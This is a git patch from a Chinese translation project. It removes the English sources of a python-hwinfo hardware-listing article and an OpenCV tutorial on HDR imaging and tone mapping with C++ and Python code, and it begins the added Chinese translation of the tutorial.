-**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
-**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
-**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
-**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
-
-### How to Install python-hwinfo in Linux
-
-It can be installed through the pip package manager on all major Linux distributions. In order to install python-hwinfo, make sure your system has the python and python-pip packages as prerequisites.
-
-pip is a Python module bundled with setuptools; it's one of the recommended tools for installing Python packages on Linux.
-
-For **`Debian/Ubuntu`** , use [APT-GET Command][7] or [APT Command][8] to install pip.
-```
-$ sudo apt install python-pip
-
-```
-
-For **`RHEL/CentOS`** , use [YUM Command][9] to install pip.
-```
-$ sudo yum install python-pip python-devel
-
-```
-
-For **`Fedora`** , use [DNF Command][10] to install pip.
-```
-$ sudo dnf install python-pip
-
-```
-
-For **`Arch Linux`** , use [Pacman Command][11] to install pip.
-```
-$ sudo pacman -S python-pip
-
-```
-
-For **`openSUSE`** , use [Zypper Command][12] to install pip.
-```
-$ sudo zypper install python-pip
-
-```
-
-Finally, run the following pip command to install python-hwinfo.
-```
-$ sudo pip install python-hwinfo
-
-```
-
-### How to Use python-hwinfo in local machine
-
-Execute the following command to inspect the hardware present on a local machine. The output is much clearer and neater than what I have seen from any other command.
-
-It categorizes the output into five classes.
-
- * **`Bios Info:`** It contains bios_vendor_name, system_product_name, system_serial_number, system_uuid, system_manufacturer, bios_release_date, and bios_version
- * **`CPU Info:`** It displays the processor number, vendor_id, cpu_family, model, stepping, model_name, and cpu_mhz
- * **`Ethernet Controller Info:`** It shows device_bus_id, vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
- * **`Storage Controller Info:`** It shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
- * **`GPU Info:`** It shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
-
-
-```
-$ sudo hwinfo
-
-Bios Info:
-
-+----------------------|--------------------------------------+
-| Key | Value |
-+----------------------|--------------------------------------+
-| bios_vendor_name | IBM |
-| system_product_name | System x3550 M3: -[6102AF1]- |
-| system_serial_number | RS2IY21 |
-| chassis_type | Rack Mount Chassis |
-| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
-| system_manufacturer | IBM |
-| socket_count | 2 |
-| bios_release_date | 10/21/2014 |
-| bios_version | -[VLS211TSU-2.51]- |
-| socket_designation | Socket 1, Socket 2 |
-+----------------------|--------------------------------------+
-
-CPU Info:
-
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-
-Ethernet Controller Info:
-
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-
-Storage Controller Info:
-
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
-| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-
-GPU Info:
-
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-
-```
-
-### How to Use python-hwinfo in remote machine
-
-Execute the following command to inspect the hardware present on a remote machine; this requires the remote server's IP, username, and password.
-```
-$ hwinfo -m x.x.x.x -u root -p password
-
-```
-
-### How to Use python-hwinfo to read captured outputs
-
-Execute the following command to read the hardware information from a previously captured output file.
-```
-$ hwinfo -f [Path to file]
-
-```
-
---------------------------------------------------------------------------------
-
-via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
-
-作者:[2DAYGEEK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.2daygeek.com/author/2daygeek/
-[1]:https://github.com/rdobson/python-hwinfo
-[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
-[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
-[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
-[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
-[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
-[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
-[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
-[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
-[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
-[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
-[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
From 4bcc5e11be8e2f9cd90d7c4ca9ae94876f95cd2c Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Wed, 10 Jan 2018 21:17:41 +0800
Subject: [PATCH 220/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90-20?=
=?UTF-8?q?171002=20High=20Dynamic=20Range=20Imaging=20using=20OpenCV=20Cp?=
=?UTF-8?q?p=20python.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...c Range Imaging using OpenCV Cpp python.md | 423 ------------------
...c Range Imaging using OpenCV Cpp python.md | 416 +++++++++++++++++
2 files changed, 416 insertions(+), 423 deletions(-)
delete mode 100644 sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
create mode 100644 translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
diff --git a/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md b/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
deleted file mode 100644
index 3af2d30333..0000000000
--- a/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
+++ /dev/null
@@ -1,423 +0,0 @@
-translating by flowsnow
-
-High Dynamic Range (HDR) Imaging using OpenCV (C++/Python)
-============================================================
-
-
-
-In this tutorial, we will learn how to create a High Dynamic Range (HDR) image using multiple images taken with different exposure settings. We will share code in both C++ and Python.
-
-### What is High Dynamic Range (HDR) imaging?
-
-Most digital cameras and displays capture or display color images as 24-bit matrices. There are 8 bits per color channel and the pixel values are therefore in the range 0 – 255 for each channel. In other words, a regular camera or a display has a limited dynamic range.
-
-However, the world around us has a very large dynamic range. It can get pitch black inside a garage when the lights are turned off and it can get really bright if you are looking directly at the Sun. Even without considering those extremes, in everyday situations, 8-bits are barely enough to capture the scene. So, the camera tries to estimate the lighting and automatically sets the exposure so that the most interesting aspect of the image has good dynamic range, and the parts that are too dark and too bright are clipped off to 0 and 255 respectively.
-
-In the Figure below, the image on the left is a normally exposed image. Notice the sky in the background is completely washed out because the camera decided to use a setting where the subject (my son) is properly photographed, but the bright sky is washed out. The image on the right is an HDR image produced by the iPhone.
-
- [![High Dynamic Range (HDR)](http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg)][3]
-
-How does an iPhone capture an HDR image? It actually takes 3 images at three different exposures. The images are taken in quick succession so there is almost no movement between the three shots. The three images are then combined to produce the HDR image. We will see the details in the next section.
-
-The process of combining different images of the same scene acquired under different exposure settings is called High Dynamic Range (HDR) imaging.
-
-### How does High Dynamic Range (HDR) imaging work?
-
-In this section, we will go through the steps of creating an HDR image using OpenCV.
-
-To easily follow this tutorial, please [download][4] the C++ and Python code and images by clicking [here][5]. If you are interested to learn more about AI, Computer Vision and Machine Learning, please [subscribe][6] to our newsletter.
-
-### Step 1: Capture multiple images with different exposures
-
-When we take a picture using a camera, we have only 8-bits per channel to represent the dynamic range ( brightness range ) of the scene. But we can take multiple images of the scene at different exposures by changing the shutter speed. Most SLR cameras have a feature called Auto Exposure Bracketing (AEB) that allows us to take multiple pictures at different exposures with just one press of a button. If you are using an iPhone, you can use this [AutoBracket HDR app][7] and if you are an android user you can try [A Better Camera app][8].
-
-Using AEB on a camera or an auto bracketing app on the phone, we can take multiple pictures quickly one after the other so the scene does not change. When we use HDR mode in an iPhone, it takes three pictures.
-
-1. An underexposed image: This image is darker than the properly exposed image. The goal is to capture parts of the image that are very bright.
-
-2. A properly exposed image: This is the regular image the camera would have taken based on the illumination it has estimated.
-
-3. An overexposed image: This image is brighter than the properly exposed image. The goal is to capture parts of the image that are very dark.
-
-However, if the dynamic range of the scene is very large, we can take more than three pictures to compose the HDR image. In this tutorial, we will use 4 images taken with exposure time 1/30, 0.25, 2.5 and 15 seconds. The thumbnails are shown below.
-
- [![Auto Exposure Bracketed HDR image sequence](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg)][9]
-
-The information about the exposure time and other settings used by an SLR camera or a Phone are usually stored in the EXIF metadata of the JPEG file. Check out this [link][10] to see EXIF metadata stored in a JPEG file in Windows and Mac. Alternatively, you can use my favorite command line utility for EXIF called [EXIFTOOL ][11].
-
-Let's start by reading in the images and assigning the exposure times.
-
-C++
-
-```
-void readImagesAndTimes(vector<Mat> &images, vector<float> &times)
-{
-
- int numImages = 4;
-
- // List of exposure times
- static const float timesArray[] = {1/30.0f,0.25,2.5,15.0};
- times.assign(timesArray, timesArray + numImages);
-
- // List of image filenames
- static const char* filenames[] = {"img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"};
- for(int i=0; i < numImages; i++)
- {
- Mat im = imread(filenames[i]);
- images.push_back(im);
- }
-
-}
-```
-
-Python
-
-```
-def readImagesAndTimes():
- # List of exposure times
- times = np.array([ 1/30.0, 0.25, 2.5, 15.0 ], dtype=np.float32)
-
- # List of image filenames
- filenames = ["img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"]
- images = []
- for filename in filenames:
- im = cv2.imread(filename)
- images.append(im)
-
- return images, times
-```
-
-### Step 2: Align Images
-
-Misalignment of images used in composing the HDR image can result in severe artifacts. In the Figure below, the image on the left is an HDR image composed using unaligned images and the image on the right is one using aligned images. By zooming into a part of the image, shown using red circles, we see severe ghosting artifacts in the left image.
-
- [![Misalignment problem in HDR](http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg)][12]
-
-Naturally, while taking the pictures for creating an HDR image, professional photographers mount the camera on a tripod. They also use a feature called [mirror lockup][13] to reduce additional vibrations. Even then, the images may not be perfectly aligned because there is no way to guarantee a vibration-free environment. The problem of alignment gets a lot worse when images are taken using a handheld camera or a phone.
-
-Fortunately, OpenCV provides an easy way to align these images using `AlignMTB`. This algorithm converts all the images to median threshold bitmaps (MTB). An MTB for an image is calculated by assigning the value 1 to pixels brighter than median luminance and 0 otherwise. An MTB is invariant to the exposure time. Therefore, the MTBs can be aligned without requiring us to specify the exposure time.
-
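-To see how simple an MTB really is, here is a tiny NumPy sketch of the idea (an illustration only, not OpenCV's AlignMTB implementation):
-
-```
-# Median threshold bitmap (MTB) of a single image -- illustration only.
-import cv2
-import numpy as np
-
-def median_threshold_bitmap(img_bgr):
-    gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)
-    # Pixels brighter than the median luminance map to 1, the rest to 0,
-    # which makes the bitmap largely independent of the exposure time.
-    return (gray > np.median(gray)).astype(np.uint8)
-```
-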
-MTB based alignment is performed using the following lines of code.
-
-C++
-
-```
-// Align input images
-Ptr<AlignMTB> alignMTB = createAlignMTB();
-alignMTB->process(images, images);
-```
-
-Python
-
-```
-# Align input images
-alignMTB = cv2.createAlignMTB()
-alignMTB.process(images, images)
-```
-
-### Step 3: Recover the Camera Response Function
-
-The response of a typical camera is not linear to scene brightness. What does that mean? Suppose, two objects are photographed by a camera and one of them is twice as bright as the other in the real world. When you measure the pixel intensities of the two objects in the photograph, the pixel values of the brighter object will not be twice that of the darker object! Without estimating the Camera Response Function (CRF), we will not be able to merge the images into one HDR image.
-
-What does it mean to merge multiple exposure images into an HDR image?
-
-Consider just ONE pixel at some location (x,y) of the images. If the CRF was linear, the pixel value would be directly proportional to the exposure time unless the pixel is too dark ( i.e. nearly 0 ) or too bright ( i.e. nearly 255) in a particular image. We can filter out these bad pixels ( too dark or too bright ), and estimate the brightness at a pixel by dividing the pixel value by the exposure time and then averaging this brightness value across all images where the pixel is not bad ( too dark or too bright ). We can do this for all pixels and obtain a single image where all pixels are obtained by averaging “good” pixels.
-
-But the CRF is not linear and we need to make the image intensities linear before we can merge/average them by first estimating the CRF.
-
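-To make the averaging idea above concrete, here is what that naive merge would look like if the CRF really were linear. This is a NumPy illustration only, not OpenCV's MergeDebevec:
-
-```
-# Naive HDR merge assuming a LINEAR camera response -- illustration only.
-import numpy as np
-
-def naive_linear_merge(images, times, low=5, high=250):
-    acc = np.zeros(images[0].shape, dtype=np.float64)
-    weight = np.zeros(images[0].shape, dtype=np.float64)
-    for img, t in zip(images, times):
-        img = img.astype(np.float64)
-        good = (img > low) & (img < high)      # skip clipped (too dark / too bright) pixels
-        acc += np.where(good, img / t, 0.0)    # brightness estimate = pixel value / exposure time
-        weight += good
-    return acc / np.maximum(weight, 1.0)       # average over the images where the pixel was "good"
-```
-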
-The good news is that the CRF can be estimated from the images if we know the exposure times for each image. Like many problems in computer vision, the problem of finding the CRF is set up as an optimization problem where the goal is to minimize an objective function consisting of a data term and a smoothness term. These problems usually reduce to a linear least squares problem which are solved using Singular Value Decomposition (SVD) that is part of all linear algebra packages. The details of the CRF recovery algorithm are in the paper titled [Recovering High Dynamic Range Radiance Maps from Photographs][14].
-
-Finding the CRF is done using just two lines of code in OpenCV using `CalibrateDebevec` or `CalibrateRobertson`. In this tutorial we will use `CalibrateDebevec`
-
-C++
-
-```
-// Obtain Camera Response Function (CRF)
-Mat responseDebevec;
-Ptr<CalibrateDebevec> calibrateDebevec = createCalibrateDebevec();
-calibrateDebevec->process(images, responseDebevec, times);
-
-```
-
-Python
-
-```
-# Obtain Camera Response Function (CRF)
-calibrateDebevec = cv2.createCalibrateDebevec()
-responseDebevec = calibrateDebevec.process(images, times)
-```
-
-The figure below shows the CRF recovered using the images for the red, green and blue channels.
-
- [![Camera Response Function](http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg)][15]
-
-### Step 4: Merge Images
-
-Once the CRF has been estimated, we can merge the exposure images into one HDR image using `MergeDebevec`. The C++ and Python code is shown below.
-
-C++
-
-```
-// Merge images into an HDR linear image
-Mat hdrDebevec;
-Ptr<MergeDebevec> mergeDebevec = createMergeDebevec();
-mergeDebevec->process(images, hdrDebevec, times, responseDebevec);
-// Save HDR image.
-imwrite("hdrDebevec.hdr", hdrDebevec);
-```
-
-Python
-
-```
-# Merge images into an HDR linear image
-mergeDebevec = cv2.createMergeDebevec()
-hdrDebevec = mergeDebevec.process(images, times, responseDebevec)
-# Save HDR image.
-cv2.imwrite("hdrDebevec.hdr", hdrDebevec)
-```
-
-The HDR image saved above can be loaded in Photoshop and tonemapped. An example is shown below.
-
- [![HDR Photoshop tone mapping](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping-1024x770.jpg)][16] HDR Photoshop tone mapping
-
-### Step 5: Tone mapping
-
-Now we have merged our exposure images into one HDR image. Can you guess the minimum and maximum pixel values for this image? The minimum value is obviously 0 for a pitch black condition. What is the theoretical maximum value? Infinite! In practice, the maximum value is different for different situations. If the scene contains a very bright light source, we will see a very large maximum value.
-
-Even though we have recovered the relative brightness information using multiple images, we now have the challenge of saving this information as a 24-bit image for display purposes.
-
-The process of converting a High Dynamic Range (HDR) image to an 8-bit per channel image while preserving as much detail as possible is called Tone mapping.
-
-There are several tone mapping algorithms. OpenCV implements four of them. The thing to keep in mind is that there is no right way to do tone mapping. Usually, we want to see more detail in the tonemapped image than in any one of the exposure images. Sometimes the goal of tone mapping is to produce realistic images and often times the goal is to produce surreal images. The algorithms implemented in OpenCV tend to produce realistic and therefore less dramatic results.
-
-Let’s look at the various options. Some of the common parameters of the different tone mapping algorithms are listed below.
-
-1. gamma : This parameter compresses the dynamic range by applying a gamma correction. When gamma is equal to 1, no correction is applied. A gamma of less than 1 darkens the image, while a gamma greater than 1 brightens the image. (A small sketch after this list illustrates the idea.)
-
-2. saturation : This parameter is used to increase or decrease the amount of saturation. When saturation is high, the colors are richer and more intense. Saturation value closer to zero, makes the colors fade away to grayscale.
-
-3. contrast : Controls the contrast ( i.e. log (maxPixelValue/minPixelValue) ) of the output image.
-
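-As a rough feel for what the gamma parameter above does, a hand-rolled global operator might look like the sketch below. This is only an illustration of gamma compression, not one of OpenCV's tonemappers:
-
-```
-# Hand-rolled global tone mapping -- gamma compression illustration only,
-# not one of OpenCV's Tonemap implementations.
-import numpy as np
-
-def simple_tonemap(hdr, gamma=2.2):
-    hdr = np.clip(hdr, 0, None)
-    ldr = hdr / (hdr.max() + 1e-8)         # normalize radiance to [0, 1]
-    ldr = np.power(ldr, 1.0 / gamma)       # exponent < 1 brightens the dark regions
-    return (ldr * 255).astype(np.uint8)    # back to a displayable 8-bit image
-```
-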
-Let us explore the four tone mapping algorithms available in OpenCV.
-
-#### Drago Tonemap
-
-The parameters for Drago Tonemap are shown below
-
-```
-createTonemapDrago
-(
-float gamma = 1.0f,
-float saturation = 1.0f,
-float bias = 0.85f
-)
-```
-
-Here, bias is the value for the bias function in the [0, 1] range. Values from 0.7 to 0.9 usually give the best results. The default value is 0.85. For more technical details, please see this [paper][17].
-
-The C++ and Python code are shown below. The parameters were obtained by trial and error. The final output is multiplied by 3 just because it gave the most pleasing results.
-
-C++
-
-```
-// Tonemap using Drago's method to obtain 24-bit color image
-Mat ldrDrago;
-Ptr<TonemapDrago> tonemapDrago = createTonemapDrago(1.0, 0.7);
-tonemapDrago->process(hdrDebevec, ldrDrago);
-ldrDrago = 3 * ldrDrago;
-imwrite("ldr-Drago.jpg", ldrDrago * 255);
-```
-
-Python
-
-```
-# Tonemap using Drago's method to obtain 24-bit color image
-tonemapDrago = cv2.createTonemapDrago(1.0, 0.7)
-ldrDrago = tonemapDrago.process(hdrDebevec)
-ldrDrago = 3 * ldrDrago
-cv2.imwrite("ldr-Drago.jpg", ldrDrago * 255)
-```
-
-Result
-
- [![HDR tone mapping using Drago's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago-1024x770.jpg)][18] HDR tone mapping using Drago’s algorithm
-
-#### Durand Tonemap
-
-The parameters for Durand Tonemap are shown below.
-
-```
-createTonemapDurand
-(
- float gamma = 1.0f,
- float contrast = 4.0f,
- float saturation = 1.0f,
- float sigma_space = 2.0f,
- float sigma_color = 2.0f
-);
-```
-The algorithm is based on the decomposition of the image into a base layer and a detail layer. The base layer is obtained using an edge-preserving filter called the bilateral filter. sigma_space and sigma_color are the parameters of the bilateral filter that control the amount of smoothing in the spatial and color domains respectively.
-
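-To build intuition for this decomposition, here is a rough illustrative sketch, not the actual Durand implementation (which handles this internally in its own way): it splits the log-luminance of the merged HDR image hdrDebevec from the earlier step into a smoothed base layer and a residual detail layer using OpenCV's bilateral filter.
-
-```
-# Illustrative base/detail split on log-luminance (sketch only)
-import cv2
-import numpy as np
-
-gray = cv2.cvtColor(hdrDebevec, cv2.COLOR_BGR2GRAY)
-logLum = np.log1p(gray)
-base = cv2.bilateralFilter(logLum, -1, 2.0, 2.0)   # edge-preserving smoothing
-detail = logLum - base                             # what the filter smoothed away
-```
-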
-For more details, check out this [paper][19].
-
-C++
-
-```
-// Tonemap using Durand's method to obtain 24-bit color image
-Mat ldrDurand;
-Ptr<TonemapDurand> tonemapDurand = createTonemapDurand(1.5, 4, 1.0, 1, 1);
-tonemapDurand->process(hdrDebevec, ldrDurand);
-ldrDurand = 3 * ldrDurand;
-imwrite("ldr-Durand.jpg", ldrDurand * 255);
-```
-Python
-
-```
-# Tonemap using Durand's method to obtain 24-bit color image
-tonemapDurand = cv2.createTonemapDurand(1.5, 4, 1.0, 1, 1)
-ldrDurand = tonemapDurand.process(hdrDebevec)
-ldrDurand = 3 * ldrDurand
-cv2.imwrite("ldr-Durand.jpg", ldrDurand * 255)
-```
-
-Result
-
- [![HDR tone mapping using Durand's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand-1024x770.jpg)][20] HDR tone mapping using Durand’s algorithm
-
-#### Reinhard Tonemap
-
-```
-
-createTonemapReinhard
-(
-float gamma = 1.0f,
-float intensity = 0.0f,
-float light_adapt = 1.0f,
-float color_adapt = 0.0f
-)
-```
-
-The parameter intensity should be in the [-8, 8] range. Greater intensity value produces brighter results. light_adapt controls the light adaptation and is in the [0, 1] range. A value of 1 indicates adaptation based only on pixel value and a value of 0 indicates global adaptation. An in-between value can be used for a weighted combination of the two. The parameter color_adapt controls chromatic adaptation and is in the [0, 1] range. The channels are treated independently if the value is set to 1 and the adaptation level is the same for every channel if the value is set to 0. An in-between value can be used for a weighted combination of the two.
-
-For more details, check out this [paper][21].
-
-C++
-
-```
-// Tonemap using Reinhard's method to obtain 24-bit color image
-Mat ldrReinhard;
-Ptr<TonemapReinhard> tonemapReinhard = createTonemapReinhard(1.5, 0, 0, 0);
-tonemapReinhard->process(hdrDebevec, ldrReinhard);
-imwrite("ldr-Reinhard.jpg", ldrReinhard * 255);
-```
-
-Python
-
-```
-# Tonemap using Reinhard's method to obtain 24-bit color image
-tonemapReinhard = cv2.createTonemapReinhard(1.5, 0,0,0)
-ldrReinhard = tonemapReinhard.process(hdrDebevec)
-cv2.imwrite("ldr-Reinhard.jpg", ldrReinhard * 255)
-```
-
-Result
-
- [![HDR tone mapping using Reinhard's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard-1024x770.jpg)][22] HDR tone mapping using Reinhard’s algorithm
-
-#### Mantiuk Tonemap
-
-```
-createTonemapMantiuk
-(
-float gamma = 1.0f,
-float scale = 0.7f,
-float saturation = 1.0f
-)
-```
-
-The parameter scale is the contrast scale factor. Values from 0.6 to 0.9 produce the best results.
-
-For more details, check out this [paper][23].
-
-C++
-
-```
-// Tonemap using Mantiuk's method to obtain 24-bit color image
-Mat ldrMantiuk;
-Ptr<TonemapMantiuk> tonemapMantiuk = createTonemapMantiuk(2.2, 0.85, 1.2);
-tonemapMantiuk->process(hdrDebevec, ldrMantiuk);
-ldrMantiuk = 3 * ldrMantiuk;
-imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255);
-```
-
-Python
-
-```
-# Tonemap using Mantiuk's method to obtain 24-bit color image
-tonemapMantiuk = cv2.createTonemapMantiuk(2.2,0.85, 1.2)
-ldrMantiuk = tonemapMantiuk.process(hdrDebevec)
-ldrMantiuk = 3 * ldrMantiuk
-cv2.imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255)
-```
-
-Result
-
- [![HDR tone mapping using Mantiuk's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk-1024x770.jpg)][24] HDR Tone mapping using Mantiuk’s algorithm
-
-### Subscribe & Download Code
-
-If you liked this article and would like to download code (C++ and Python) and example images used in this post, please [subscribe][25] to our newsletter. You will also receive a free [Computer Vision Resource][26] Guide. In our newsletter, we share OpenCV tutorials and examples written in C++/Python, and Computer Vision and Machine Learning algorithms and news.
-
-[Subscribe Now][27]
-
-Image Credits
-The four exposure images used in this post are licensed under [CC BY-SA 3.0][28] and were downloaded from [Wikipedia’s HDR page][29]. They were photographed by Kevin McCoy.
-
---------------------------------------------------------------------------------
-
-作者简介:
-
-I am an entrepreneur with a love for Computer Vision and Machine Learning, and a dozen years of experience (and a Ph.D.) in the field.
-
-In 2007, right after finishing my Ph.D., I co-founded TAAZ Inc. with my advisor Dr. David Kriegman and Kevin Barnes. The scalability and robustness of our computer vision and machine learning algorithms have been put to a rigorous test by more than 100M users who have tried our products.
-
----------------------------
-
-via: http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/
-
-作者:[ SATYA MALLICK ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.learnopencv.com/about/
-[1]:http://www.learnopencv.com/author/spmallick/
-[2]:http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/#disqus_thread
-[3]:http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg
-[4]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
-[5]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
-[6]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[7]:https://itunes.apple.com/us/app/autobracket-hdr/id923626339?mt=8&ign-mpt=uo%3D8
-[8]:https://play.google.com/store/apps/details?id=com.almalence.opencam&hl=en
-[9]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg
-[10]:https://www.howtogeek.com/289712/how-to-see-an-images-exif-data-in-windows-and-macos
-[11]:https://www.sno.phy.queensu.ca/~phil/exiftool
-[12]:http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg
-[13]:https://www.slrlounge.com/workshop/using-mirror-up-mode-mirror-lockup
-[14]:http://www.pauldebevec.com/Research/HDR/debevec-siggraph97.pdf
-[15]:http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg
-[16]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping.jpg
-[17]:http://resources.mpi-inf.mpg.de/tmo/logmap/logmap.pdf
-[18]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago.jpg
-[19]:https://people.csail.mit.edu/fredo/PUBLI/Siggraph2002/DurandBilateral.pdf
-[20]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand.jpg
-[21]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.106.8100&rep=rep1&type=pdf
-[22]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard.jpg
-[23]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.60.4077&rep=rep1&type=pdf
-[24]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk.jpg
-[25]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[26]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[27]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[28]:https://creativecommons.org/licenses/by-sa/3.0/
-[29]:https://en.wikipedia.org/wiki/High-dynamic-range_imaging
diff --git a/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md b/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
new file mode 100644
index 0000000000..400f4baa80
--- /dev/null
+++ b/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
@@ -0,0 +1,416 @@
+使用OpenCV(C ++ / Python)进行高动态范围(HDR)成像
+============================================================
+
+在本教程中,我们将学习如何使用由不同曝光设置拍摄的多张图像创建高动态范围(HDR)图像。 我们将以C ++和Python两种形式分享代码。
+
+### 什么是高动态范围成像?
+
